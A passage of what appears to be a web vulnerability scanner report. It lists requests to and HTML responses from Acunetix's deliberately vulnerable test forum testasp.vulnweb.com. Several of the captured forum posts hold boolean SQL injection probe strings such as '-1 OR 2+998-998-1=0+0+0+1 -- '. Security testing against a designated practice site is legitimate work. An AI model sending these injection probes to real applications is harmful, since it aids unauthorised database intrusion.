<tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=62 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:49 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=63 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=64 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4152 |
Response Body - size: 4,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=65 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4152 |
Response Body - size: 4,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:16 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=66 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4150 |
Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+998-998) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=67 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4150 |
Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+998-998) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=68 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4148 |
Response Body - size: 4,148 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:18 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+689-689-1=0+0+0+1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how 